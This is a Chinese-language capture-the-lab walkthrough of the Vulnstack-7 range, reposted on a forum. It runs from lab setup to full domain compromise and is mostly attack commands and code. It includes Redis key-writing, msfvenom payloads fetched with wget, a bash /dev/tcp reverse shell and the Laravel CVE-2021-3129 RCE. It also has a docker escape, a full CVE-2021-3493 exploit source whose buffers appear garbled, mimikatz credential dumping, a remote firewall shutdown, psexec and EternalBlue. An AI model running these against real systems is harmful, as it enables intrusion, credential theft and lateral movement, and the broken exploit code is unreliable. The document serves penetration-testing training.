vulnstack-7(红日靶场七)
环境配置vlunstack是红日安全团队出品的一个实战环境,具体先容请访问:漏洞详情https://i-blog.csdnimg.cn/blog_migrate/003a2ce7eb50c2e24a8c624c260c5930.pnghttp://vulnstack.qiyuanxuetang.net/vuln/detail/9/
https://i-blog.csdnimg.cn/direct/18dbf023605b45659e7a78e648ed72d5.png
添加两个网卡
https://i-blog.csdnimg.cn/direct/c880cbec35ec44e687c7f5caadc17f02.png
DMZ地区:
给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。
第二层网络地区:
给Ubuntu (Web 2) 和Windows 7 (PC 1)都配置了两个网卡,一个连接第二层网络,一个连接第三层网络。
第三次网络地区:
给Windows Server 2012和Windows 7 (PC 2)都只配置了一个网卡,连接第三层网络。
Ubuntu (Web 1)
https://i-blog.csdnimg.cn/direct/5794bcc673a241bf888bdf11e8f1200f.png
https://i-blog.csdnimg.cn/direct/428f32cb2a484f449cfb21df3c4e8d71.png
buntu (Web 2) 和Windows 7 (PC 1)
https://i-blog.csdnimg.cn/direct/9000c38f259b4f65be9adbbc69129781.png
https://i-blog.csdnimg.cn/direct/acd5299b389c4013a9b10da3ab746f67.png
Pc1
https://i-blog.csdnimg.cn/direct/2ef40938564a404dbfebc073a7a7efce.png
Windows Server 2012和Windows 7 (PC 2)
https://i-blog.csdnimg.cn/direct/cbbbdbc590a444fe80de08019cc43ee7.png
Pc2
https://i-blog.csdnimg.cn/direct/db24bf19d2f64aafa377b2c009537b63.png
Windows Server 2012
https://i-blog.csdnimg.cn/direct/aa48214b2c134720a4a501d7a0862d84.png
域用户信息
Administrator:Whoami2021
whoami:Whoami2021
bunny:Bunny2021
moretz:Moretz2021
Ubuntu 1: web:web2021
Ubuntu 2: ubuntu:ubuntu
通达OA账户: admin:admin657260
配置开启
排泄之前,我们还需要到开启相应的服务配置,每次开机都需要举行配置开启
DMZ区的 Ubuntu 需要启动redis和nginx服务:
sudo redis-server /etc/redis.conf
sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf
sudo iptables -F
https://i-blog.csdnimg.cn/direct/0383f617c56443c7b4d50c4f283ffa42.png
办理80端口占用题目
sudo netstat -ntlp
https://i-blog.csdnimg.cn/direct/1a2f6caf60c04f7aa4fb26b25b1d9b5b.png
kill -9 790
https://i-blog.csdnimg.cn/direct/67236a372e1b452b9353c85b25ca0ab8.png
第二层网络的 Ubuntu需要启动docker容器:
sudo service docker start
sudo docker start 8e172820ac78
第三层网络的 Windows 7 (PC 1)需要启动通达OA:
C:\MYOA\bin\AutoConfig.exe
https://i-blog.csdnimg.cn/direct/1e68b4e2bc3e4b07a76002257f34864b.png
外网办理
这肯定得祭出我的nmap开干对192.168.16.111 举行扫描
nmap -sV -p 1-65535 192.168.16.111
https://i-blog.csdnimg.cn/direct/224e703dd1ab40ad9b591931aacea902.png
有80、81 nginx服务 然后6379 redis数据库,我们先从80、81端口下手
192.168.16.111
redis未授权访问
https://www.cnblogs.com/bmjoker/p/9548962.html
redis-cli -h 192.168.16.111
https://i-blog.csdnimg.cn/direct/8765df1560ab4a5bbc7fea8e221146cb.png
详细步骤:
在攻击机本地天生公钥文件:
公钥文件默认路径:/root/.ssh/id_rsa.pub
ssh-keygen -t ras
https://i-blog.csdnimg.cn/direct/594b3c877c32410bb73aca784cc15196.png
/home/kali/.ssh/id_rsa.pub
/home/kali/.ssh/id_rsa
存放公私钥
具体命令:
ssh-keygen -t rsa
cd /root/.ssh
ls
cat id_rsa.pub
https://i-blog.csdnimg.cn/direct/dc8cb90eb6dc40e390cfea1d380f3e54.png
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTWukWVNmcgU6LhhuLDnypS8+KUO3FBJLNbznbqlUrUN0+YLKeVbbmm9/prjSWaGWznluzhhAQERWE3CWCuYnXhBHXemg5NuyCtOPLcW8IPW7Z05YOOhG2hyzTkbJB5vggrYPJJ/IweHaCP209ZyHSSZS0UlLDEzJMMNnh1HE0P+9qQm3/BSDodQhofSDjgHK62vB4cM2f48hc2sxWi2XpbDaiqV3irF9UKZ9Gf2ZOspOxwO/m0jsdOTTuTMbDpnDtFdJpy+9QP9lDffOL91/CSEuXyr1Tv4czqoiNfACwIX3oh6uS/W1myYrv10uyIGsEx2Qt+ykGebE9zfGEWcUDNgLGycJ4RHft4pLXDWq9tQpsQz9CP7iXu5hf2StL8yMGXKyF9qG4l3+39xmR4GCHLLPIgzPFpcIRnGP7a10OH2pWox61pR+1WNJfjtxpijwltWfejTdQsEh/Cr4MQjHxxhi5x+lxRBRCOau0FOrwgWjY8QSaixRImpm6re+MvF8= root@kali
然后通过未授权访问目标机
具体命令
redis-cli -h 192.168.16.111 #连接目标主机
config get dir #检查当前保存路径
config get dbfilename #检查保存文件名
config set dir /root/.ssh/ #设置保存路径
config set dbfilename authorized_keys #设置保存文件名
set xz “\n\n\n 公钥 \n\n\n” #将公钥写入xz健
set xz "\n\n\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTWukWVNmcgU6LhhuLDnypS8+KUO3FBJLNbznbqlUrUN0+YLKeVbbmm9/prjSWaGWznluzhhAQERWE3CWCuYnXhBHXemg5NuyCtOPLcW8IPW7Z05YOOhG2hyzTkbJB5vggrYPJJ/IweHaCP209ZyHSSZS0UlLDEzJMMNnh1HE0P+9qQm3/BSDodQhofSDjgHK62vB4cM2f48hc2sxWi2XpbDaiqV3irF9UKZ9Gf2ZOspOxwO/m0jsdOTTuTMbDpnDtFdJpy+9QP9lDffOL91/CSEuXyr1Tv4czqoiNfACwIX3oh6uS/W1myYrv10uyIGsEx2Qt+ykGebE9zfGEWcUDNgLGycJ4RHft4pLXDWq9tQpsQz9CP7iXu5hf2StL8yMGXKyF9qG4l3+39xmR4GCHLLPIgzPFpcIRnGP7a10OH2pWox61pR+1WNJfjtxpijwltWfejTdQsEh/Cr4MQjHxxhi5x+lxRBRCOau0FOrwgWjY8QSaixRImpm6re+MvF8= root@kali \n\n\n" #将公钥写入xz健
Save
#举行保存
利用公钥举行SSH登录攻击机
https://i-blog.csdnimg.cn/direct/37492c5bf9e5441f99c7a9fc3adfee8e.png
利用公钥举行SSH登录攻击机
ssh -i /root/.ssh/id_rsa root@192.168.16.111
https://i-blog.csdnimg.cn/direct/ceb2310def184869af7391d842a5dc87.png
上线msf
靶机下载shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.16.104 LPORT=1234 -f elf > shell.elf
python -m http.server 80
wget http://192.168.16.104/shell.elf
https://i-blog.csdnimg.cn/direct/06ecbed3b9dd445d8306063cfd66f9be.png
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1234
exploit
乐成上线
https://i-blog.csdnimg.cn/direct/0827c532363c4f949d46a456580ef142.png
添加路由
run get_local_subnets
https://i-blog.csdnimg.cn/direct/649e7890f9ca4a04b0322333a9dbb19d.png
run autoroute -p
https://i-blog.csdnimg.cn/direct/9b996f793d3448a7ae7b3b89873c05d0.png
run post/multi/manage/autoroute
run autoroute -p
https://i-blog.csdnimg.cn/direct/f2801c798e434db4b8536a02dd1cb46a.png
web1信息网络
s /home下的文件发现有目录web
cd /etc/nginx/conf.d/
https://i-blog.csdnimg.cn/direct/064ce5caf9ec48b896e0fdb3110af769.png
发现目录下有两个配置文件一个是80的一个是81的,80端口404报错查看81端口的配置
发现81端口举行了反向署理
Laravel
访问81端口
https://i-blog.csdnimg.cn/direct/795323ab0b3f4e31b434b9f1e9cb2801.png
查看版本
https://i-blog.csdnimg.cn/direct/bc3102ae70204d22a0341c69e03d4434.png
Laravel Debug RCE(CVE-2021-3129)
当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全利用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造发展途代码实行。这里直接利用工具 getshell,工具下载地址:
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
https://i-blog.csdnimg.cn/direct/4a4244dd22a94862abdbcfcc1dd77ecf.png
利用哥斯拉2.92版本可以直接连接
注意:高版本的哥斯拉天生的马的加密方式已经改变会导致连接失败
https://github.com/BeichenDream/Godzilla
https://i-blog.csdnimg.cn/direct/98116cd4010e4bfa8663793869617d21.png
https://i-blog.csdnimg.cn/direct/f848ac9fed4f4aebbdd71d46fcfa4a5e.png
第一台的权限我们已经利用ssh登录乐成获取了,第一次的webshll现实是获取了第二台的docker权限,因此我们可以通过webshell将第二台主机的docker权限弹回我们的已经获取的第一台内里去,再对其举行后续操作,可以看到已经反弹shell乐成。
bash -c ‘exec bash -i &>/dev/tcp/192.168.52.10/8848<&1’
https://i-blog.csdnimg.cn/direct/97c7d3c773914fe685e49a1cb702e46d.png
提权
现在我们获取的是docker,需要举行docker逃逸,都是docker逃逸需要root,因此我们需要举行提权,寻找一下看看可不可以具有SUID或4000权限的文件来举行提权
find / -perm -u=s -type f 2>/dev/null
https://i-blog.csdnimg.cn/direct/c15a088e11dd4e3e81dfa547eb760bbb.png
发现一个shell文件,试着实行大概读取一下这个文件
cd /home/jobs
https://i-blog.csdnimg.cn/direct/3f49c10674164d858f1875f4fbc5e1c8.png
https://i-blog.csdnimg.cn/direct/366a8f19bac643ccae0b62ac9e85e89b.png
该shell功能是展示ps历程,那么我们可以利用环境变量举行提权
我们写一个恶意的ps,内里进入shell命令行,修改环境变量,让shell找ps的时间找我们写的恶意ps
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH # 将/tmp添加到环境变量中,并且先加载实行/tmp里的步伐
cd /home/jobs
./shell
https://i-blog.csdnimg.cn/direct/a9643849f1ec4634b5d34b2b8fd638a7.png
运行shell后发现我们的权限提高成root了
此方法称为环境变量挟制
再来一个tty的交互式
python -c 'import pty; pty.spawn("/bin/bash")'
https://i-blog.csdnimg.cn/direct/95cc5097733e4269a114758f0b997e5b.png
现在我们实现了www用户到root用户的权限提拔,但可惜我们这台并不是实体机我们需要docker特权逃逸
特权模式于版本0.6被引入docker,允许容器内的root拥有外部物理机root的权限,而此前容器内root用户拥有外部物理机普通用户权限
首先我们在docker中新建一个/hi目录用来挂载文件
mkdir /hi
实验将/dev/sda1挂载到/hi目录里
mount /dev/sda1 /hi
ls /hi
https://i-blog.csdnimg.cn/direct/3c90535969744e15993bd2a24c2dd752.png
我们在刚才获取的web1主机上天生一个ssh密钥
接下来将我们天生的ssh密钥写入/hi/home/ubuntu/.ssh目录的authorzed_keys文件中,写入后我们就可以利用密钥登录改机器
ssh-keygen -f hi
chmod 777 hi
https://i-blog.csdnimg.cn/direct/e2a82d99af744937963d6417e9ef2a5b.png
我们将hi.hub中的密钥写入/hi/home/ubuntu/.ssh/authorized_keys中
Web1(root)天生rsa
ssh-keygen -t rsa
cd /root/.ssh
ls
cat id_rsa.pub
https://i-blog.csdnimg.cn/direct/fe30c43491ec4d789620e9ea7f7a110d.png
公钥写入web2
echo '天生的.pub文件的内容' > /hi/home/ubuntu/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDI1p1D1I5WUZIaymEmmiDc4FO8XI9JaXV0Sk2zPaAT5BBASuvvYwGUXGIZbrX666ut1mYFxlWr6tn0l7E9tille27Rut051MINW8bxQmL9KthH+jPuRsBTaX2lhqra8ClLmUFzSluuaGZS+aO7We6jcVp6uDP1AUDNtfsg8xf7TIXM0hBhE+EwaopGukraqSUQDYJq4Oyi3GAy29KdMQSdL/QGFCihCE/WfPaU+15C4pYuoP6nV1KdgO96PXBkBIPtWb0XJN12OPSJGBjt6EgYNA388nHAN0CHpNywAKD0ft702fo5qbdKrApO6pAyy93eRX3Y1ImGB1GTQi4tl5pH root@ubuntu' > /hi/home/ubuntu/.ssh/authorized_keys
https://i-blog.csdnimg.cn/direct/67a3f721185742b49ae1e58260269106.png
然后我们查看一下是否写入乐成
cat /hi/home/ubuntu/.ssh/authorized_keys
登录
ssh -i /root/.ssh/id_rsa ubuntu@192.168.52.20
https://i-blog.csdnimg.cn/direct/8884a058b16547b78ff0564a3eff8f61.png
权限提拔
uname -a
发现版本为ubuntu14.04版本,此版本存在CVE-2021-3493漏洞
https://i-blog.csdnimg.cn/direct/ffb61ca2340e4c19a143900e00686960.png
https://github.com/briskets/CVE-2021-3493
影响版本
Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
(Linux内核版本 < 5.11)
我们首先建立一个exploit.c文件,然后将脚本内容粘贴举行,然后编译运行就可以获得权限
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mount.h>
//#include <attr/xattr.h>
//#include <sys/xattr.h>
int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);
#define DIR_BASE "./ovlcap"
#define DIR_WORK DIR_BASE "/work"
#define DIR_LOWER DIR_BASE "/lower"
#define DIR_UPPER DIR_BASE "/upper"
#define DIR_MERGE DIR_BASE "/merge"
#define BIN_MERGE DIR_MERGE "/magic"
#define BIN_UPPER DIR_UPPER "/magic"
static void xmkdir(const char *path, mode_t mode)
{
if (mkdir(path, mode) == -1 && errno != EEXIST)
err(1, "mkdir %s", path);
}
static void xwritefile(const char *path, const char *data)
{
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "open %s", path);
ssize_t len = (ssize_t) strlen(data);
if (write(fd, data, len) != len)
err(1, "write %s", path);
close(fd);
}
static void xcopyfile(const char *src, const char *dst, mode_t mode)
{
int fi, fo;
if ((fi = open(src, O_RDONLY)) == -1)
err(1, "open %s", src);
if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)
err(1, "open %s", dst);
char buf;
ssize_t rd, wr;
for (;;) {
rd = read(fi, buf, sizeof(buf));
if (rd == 0) {
break;
} else if (rd == -1) {
if (errno == EINTR)
continue;
err(1, "read %s", src);
}
char *p = buf;
while (rd > 0) {
wr = write(fo, p, rd);
if (wr == -1) {
if (errno == EINTR)
continue;
err(1, "write %s", dst);
}
p += wr;
rd -= wr;
}
}
close(fi);
close(fo);
}
static int exploit()
{
char buf;
sprintf(buf, "rm -rf '%s/'", DIR_BASE);
system(buf);
xmkdir(DIR_BASE, 0777);
xmkdir(DIR_WORK,0777);
xmkdir(DIR_LOWER, 0777);
xmkdir(DIR_UPPER, 0777);
xmkdir(DIR_MERGE, 0777);
uid_t uid = getuid();
gid_t gid = getgid();
if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
err(1, "unshare");
xwritefile("/proc/self/setgroups", "deny");
sprintf(buf, "0 %d 1", uid);
xwritefile("/proc/self/uid_map", buf);
sprintf(buf, "0 %d 1", gid);
xwritefile("/proc/self/gid_map", buf);
sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);
if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
err(1, "mount %s", DIR_MERGE);
// all+ep
char cap[] = "\x01\x00\x00\x02\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00";
xcopyfile("/proc/self/exe", BIN_MERGE, 0777);
if (setxattr(BIN_MERGE, "security.capability", cap, sizeof(cap) - 1, 0) == -1)
err(1, "setxattr %s", BIN_MERGE);
return 0;
}
int main(int argc, char *argv[])
{
if (strstr(argv, "magic") || (argc > 1 && !strcmp(argv, "shell"))) {
setuid(0);
setgid(0);
execl("/bin/bash", "/bin/bash", "--norc", "--noprofile", "-i", NULL);
err(1, "execl /bin/bash");
}
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
_exit(exploit());
} else {
waitpid(child, NULL, 0);
}
execl(BIN_UPPER, BIN_UPPER, "shell", NULL);
err(1, "execl %s", BIN_UPPER);
}
vim exploit.c
gcc exploit.c -o exploit
chmod +x exploit
./exploit
MSF进攻内网
乐成提权,接下来两台机子上线MSF进攻内网
https://i-blog.csdnimg.cn/direct/ec8bec6a98f44d09abdf528ac03c33e7.png
msfvenom -p linux/x64/meterpreter/bind_tcp lport=6666 -f elf > bind.elf
wget http://192.168.52.10:81/bind.elf
https://i-blog.csdnimg.cn/direct/72b6d822ebbf448abadf44ab3126e2a3.png
上线msf
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.52.20
set LPORT 6666
run
https://i-blog.csdnimg.cn/direct/fd67385b8fab4160b14b61526c94c894.png
https://i-blog.csdnimg.cn/direct/770c739fb1df44819a385af5fe2fa9b1.png
隧道搭建
/home/kali/Desktop/ew-master/ew_for_linux64
nohup ./ew_for_linux64 -s rssocks -d 192.168.16.104 -e 4444
./ew_for_linux64 -s rcsocks -l 1080 -e 4444
https://i-blog.csdnimg.cn/direct/9f4e62b11a5e4fa3b0403d11506b4fe1.png
访问内网
https://i-blog.csdnimg.cn/direct/461026f18bce4d45858c1dc9447f3cf8.png
发现通达OA服务
通达OA任意文件上传
利用通达OA漏洞工具举行检测、利用
工具地址:GitHub - Fu5r0dah/TongdaScan_go: 通达OA漏洞检测工具-TongdaScan_go
漏洞检测
https://i-blog.csdnimg.cn/direct/f1ead99947804df38512b0d004ac71e3.png
http://192.168.52.30:8080/_doit.php
密码:just
https://i-blog.csdnimg.cn/direct/2578af638cd945428936c1a7c990bddd.png
网络信息和网卡信息,发现93网段有两台主机,举行msf93网段横向移动,
上线pc1
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > msf.exe
https://i-blog.csdnimg.cn/direct/980e2016736244979120151fc1d4ceca.png
哥斯拉上传木马
https://i-blog.csdnimg.cn/direct/45676f872168486b903afc9da15db20d.png
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > msf.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set lport 4444
set RHOST 192.168.52.30
https://i-blog.csdnimg.cn/direct/56fc64132e484336ad969363874c0027.png
域信息网络命令;
net view # 查看局域网内其他主机名
net config Workstation # 查看计算机名、全名、用户名、体系版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域内里的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain # 查看域中某工作组
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器主机名(可能有多台)
https://i-blog.csdnimg.cn/direct/aed0941611024a338dee3d9c11c90926.png
发现93网段
https://i-blog.csdnimg.cn/direct/73dd04a22dbe4484a559ce617b133a64.png
https://i-blog.csdnimg.cn/direct/0c5d78f0b6df4d42af0d9cee335bc94f.png
kiwi模块
利用kiwi模块需要system权限,以是我们在利用该模块之前需要将当前MSF中的shell提拔为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用别的本事先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
#kiwi不能在x64运行 必须要内存迁移
load kiwi
kiwi_cmd privilege::debug
ps
migrate 1832
kiwi_cmd sekurlsa::logonpasswords
https://i-blog.csdnimg.cn/direct/c63903069a8b4492bca74c5817d20e64.png
https://i-blog.csdnimg.cn/direct/729f6d75156e4bb99f8f10458dc30fc9.png
可以看到一大堆明文密码,我们可以利用msf自带的 psexec举行移动,移动之前我们还需要关闭92.30网段的防火墙,利用ipc举行连接关闭防火墙
先建立ipc连接
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
https://i-blog.csdnimg.cn/direct/a6f0f955b7864a978694a8d032bac757.png
创建关闭防火墙任务
sc \\192.168.93.30 create unablefirewall binpath="netsh advfirewall set allprofiles state off"
实行
sc \\192.168.93.30 start unablefirewall
https://i-blog.csdnimg.cn/direct/8b2741ddb0e54eb3bf3044913eaab6f4.png
psexec举行横向
PSExec工具
利用PSExec条件:SMB服务必须开启以及可达。文件和打印机共享必须开启,禁止简单文件共享。
Admin$必须可以访问。PSExec利用的口令必须可以访问Admin$共享。
在PSExec可实行文件中含有一个Windows服务。它利用该服务并且在远端机器上部署Admin$。然后通过SMB利用DCE/RPC接口来访问Windows Service Control Manager API。然后在长途主机中开启PSExec访问。然后PSExec服务创建一个命名管道,用它来发送死令。
exploit/windows/smb/psexec
exploit在可实行文件中天生/嵌入一个payload,其本质是用过PSExec工具上传的一个服务image。然后exploit利用提供的口令来把服务可实行文件上传到Admin$中,连接到DEC/RPC接口,然后在告诉SCM启动我们部署的服务之前调用Service Control Manager。当服务启动后,创建一个rundll32.exe历程,在历程中分配可实行内存,然后把shellcode拷贝到历程中。然后调用内存地址,实行shellcode。
可实行文件由模板天生,可以由杀毒软件发现。
添加路由
run post/multi/manage/autoroute
run autoroute -p
抓取到域管理员的密码了,直接psexec登陆
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
set smbuser administrator
set smbpass Whoami2021
https://i-blog.csdnimg.cn/direct/d721f661dc9d4e68ac0e38929d5540c1.png
上线了
https://i-blog.csdnimg.cn/direct/f34cd77df5c84e35889355bbdd701c2b.png
上线Pc2
这里可以直接打一波永恒之蓝
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.93.40
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.93.40
set lport 5555
exploit
https://i-blog.csdnimg.cn/direct/0e23b3b19d5a4b73b2db9df619bc71c0.png
https://i-blog.csdnimg.cn/direct/161487c7447e43b1998c6e8fe9f30832.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]